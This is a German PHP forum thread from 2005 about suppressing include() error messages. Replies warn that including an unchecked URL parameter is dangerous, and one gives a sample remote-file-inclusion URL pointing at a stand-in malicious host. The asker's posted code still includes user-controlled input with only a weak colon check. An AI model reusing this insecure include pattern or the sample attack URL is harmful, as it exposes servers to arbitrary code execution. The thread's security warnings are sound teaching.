Include fehler abfangen?

fadass · 09.10.2005, 11:37

hi,

also kein problem mit script, das funzt 1A, wollte nur wissen wie man fehler von inclue() abfängt,
ich prbier es so:

PHP-Code:

  <?php

if (!@include $site.'.php')

      {

      echo "Fehler: Die Seite existiert [b]nicht[/b]!
";

      echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]';

      }

?>

es wird auch alles angezeigt, leider etwas zu viel,

Code:

Warning: Failed opening 'news.php' for inclusion (include_path='.;c:\php4\pear') in c:\foxserv\www\wc3\index.php on line 73
404 Fehler: Die Seite existiert nicht!
Zurück zur letzten Seite

das

Code:

Fehler: Die Seite existiert nicht!
Zurück zur letzten Seite

soll stehen bleiben, nur der rest net, könnt ihr mir helfen???

danke im voraus!

p.s: Diesmal kein doppelpost, versprochen!!

Buhmann · 09.10.2005, 11:41

mach doch einfach

PHP-Code:

  <?php

if (!file_exists($site.'.php'))

      {

      echo "Fehler: Die Seite existiert [b]nicht[/b]!
";

      echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]';

} else {

      include $site.'.php';

}

?>

[edit]

O.o, mein tausendster Post

09.10.2005, 11:43

Ich will aber hoffen, dass $site nicht ungeprüft über die URL in das Script kommt, oder?

Gruß
phpfan

fadass · 09.10.2005, 13:59

@phpfan, ahhhhh doch is das schlimm?

09.10.2005, 14:08

Dann überlege, was z.B. mit so einem Aufruf passiert:

index.php?site=index

Mir fallen da auch noch andere böse Sachen ein, die ich aber hier lieber nicht schreibe.

PHP-Code:

  <?

     if (isset($_GET['site']))

     {

          switch ($_GET['site'])

          {

              case 'news' : $include = "news.php"; break;

              case 'gbook': $include = "gbook.php"; break;

              default: $include = "home.php";

          }

     }

     else

        $include = "home.php";

 
     include ($include);

?>

Gruß
phpfan

fadass · 09.10.2005, 14:18

da wird doch nur ne variable über die url übergeben?? oder net? is doch nix schlimmes

ZiMD · 09.10.2005, 14:34

index.php?include=http://www.boeseseite.de/boesesscrip

und jetzt?

09.10.2005, 14:37

Zitat:

Zitat von fadass

da wird doch nur ne variable über die url übergeben?? oder net? is doch nix schlimmes

Nochmal!!! Was passiert bei einem Aufruf der Datei index.php, wenn die URL manipuliert wird und so aussieht

index.php?site=index

und in der index.php ungeprüft das steht:

include $site.'.php';

Gruß
phpfan

fadass · 09.10.2005, 14:50

da wird die seite $site included hia der code

PHP-Code:

  <?php

    if(!isset($site)) $site = "news";

 
         $mysql_ok = strstr($site,":");

         if($mysql_ok != FALSE) $site = "news";

                      include($site.".php");

      if (!@include $site.'.php')

      {

      echo "Fehler: Die Seite existiert [b]nicht[/b]!
";

      echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]';

      } 

 
       

?>

ZiMD · 09.10.2005, 14:53

hallo?

wenn ers so macht wie in meinem beispiel kann der einfach beliebigen code auf deinem server ausführen!!!!

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Thema bewerten
Thema bewerten:

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Fehler beim Include	winki	PHP Tipps 2006	1	17.04.2006 19:33
fehler bei Include		PHP Tipps 2006	20	15.02.2006 11:35
Fehler beim include		PHP Tipps 2005-2	4	20.10.2005 12:47
Fehler abfangen	nieselfriem	PHP Tipps 2005-2	2	10.10.2005 17:11
include fehler		PHP Tipps 2005-2	1	30.09.2005 09:30
Fehler abfangen bei Eintrag in DB	Crypi	PHP Tipps 2005-2	15	18.08.2005 15:14
XAMPP include fehler		Server, Hosting und Workstations	2	04.08.2005 10:30
Fehler abfangen in Klassen		PHP Tipps 2005-2	26	25.06.2005 19:26
Fehler bei var übergabe in include datei	JEGO	PHP Tipps 2005-2	9	16.06.2005 15:28
Fehler abfangen bei MySQL Abfrage	Dave Waterstone	PHP Tipps 2005	4	21.02.2005 15:15
eval fehler abfangen		PHP Tipps 2005	9	18.02.2005 19:37
[Erledigt] Alle Fehler außer Notice abfangen ?		PHP-Fortgeschrittene	7	05.12.2004 16:39
php-variblen Fehler mit JavaScript abfangen möglich?		HTML, Usability und Barrierefreiheit	2	27.10.2004 01:08
array_push nur in begrenzter Anzahl ausführen ?		PHP Tipps 2004	2	07.09.2004 09:05
Include fehler		PHP Tipps 2004	9	02.08.2004 22:51

09.10.2005, 11:37
fadass Erfahrener Benutzer Registriert seit: 08.07.2005 Beiträge: 108	Include fehler abfangen? hi, also kein problem mit script, das funzt 1A, wollte nur wissen wie man fehler von inclue() abfängt, ich prbier es so: PHP-Code: `<?php if (!@include $site.'.php') { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]'; } ?>` es wird auch alles angezeigt, leider etwas zu viel, Code: Warning: Failed opening 'news.php' for inclusion (include_path='.;c:\php4\pear') in c:\foxserv\www\wc3\index.php on line 73 404 Fehler: Die Seite existiert nicht! Zurück zur letzten Seite das Code: Fehler: Die Seite existiert nicht! Zurück zur letzten Seite soll stehen bleiben, nur der rest net, könnt ihr mir helfen??? danke im voraus! p.s: Diesmal kein doppelpost, versprochen!!


Mister Ad PHP Code Flüsterer Registriert seit: 21.08.2005 Beiträge: 4682 PHP-Kenntnisse: Fortgeschritten

09.10.2005, 11:41
Buhmann Erfahrener Benutzer Registriert seit: 20.01.2005 Beiträge: 1.557 PHP-Kenntnisse: Fortgeschritten	mach doch einfach PHP-Code: `<?php if (!file_exists($site.'.php')) { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]'; } else { include $site.'.php'; } ?>` [edit] O.o, mein tausendster Post

09.10.2005, 11:43
Gast Beiträge: n/a	Ich will aber hoffen, dass $site nicht ungeprüft über die URL in das Script kommt, oder? Gruß phpfan

09.10.2005, 13:59
fadass Erfahrener Benutzer Registriert seit: 08.07.2005 Beiträge: 108	@phpfan, ahhhhh doch is das schlimm?

09.10.2005, 14:08
Gast Beiträge: n/a	Dann überlege, was z.B. mit so einem Aufruf passiert: index.php?site=index Mir fallen da auch noch andere böse Sachen ein, die ich aber hier lieber nicht schreibe. PHP-Code: `<? if (isset($_GET['site'])) { switch ($_GET['site']) { case 'news' : $include = "news.php"; break; case 'gbook': $include = "gbook.php"; break; default: $include = "home.php"; } } else $include = "home.php"; include ($include); ?>` Gruß phpfan

09.10.2005, 14:18
fadass Erfahrener Benutzer Registriert seit: 08.07.2005 Beiträge: 108	da wird doch nur ne variable über die url übergeben?? oder net? is doch nix schlimmes

09.10.2005, 14:34
ZiMD Erfahrener Benutzer Registriert seit: 11.08.2005 Beiträge: 206	index.php?include=http://www.boeseseite.de/boesesscrip und jetzt?

09.10.2005, 14:50
fadass Erfahrener Benutzer Registriert seit: 08.07.2005 Beiträge: 108	da wird die seite $site included hia der code PHP-Code: `<?php if(!isset($site)) $site = "news"; $mysql_ok = strstr($site,":"); if($mysql_ok != FALSE) $site = "news"; include($site.".php"); if (!@include $site.'.php') { echo "Fehler: Die Seite existiert [b]nicht[/b]! "; echo '[url="javascript:history.back();"]Zurück zur letzten Seite[/url]'; } ?>`

09.10.2005, 14:53
ZiMD Erfahrener Benutzer Registriert seit: 11.08.2005 Beiträge: 206	hallo? wenn ers so macht wie in meinem beispiel kann der einfach beliebigen code auf deinem server ausführen!!!!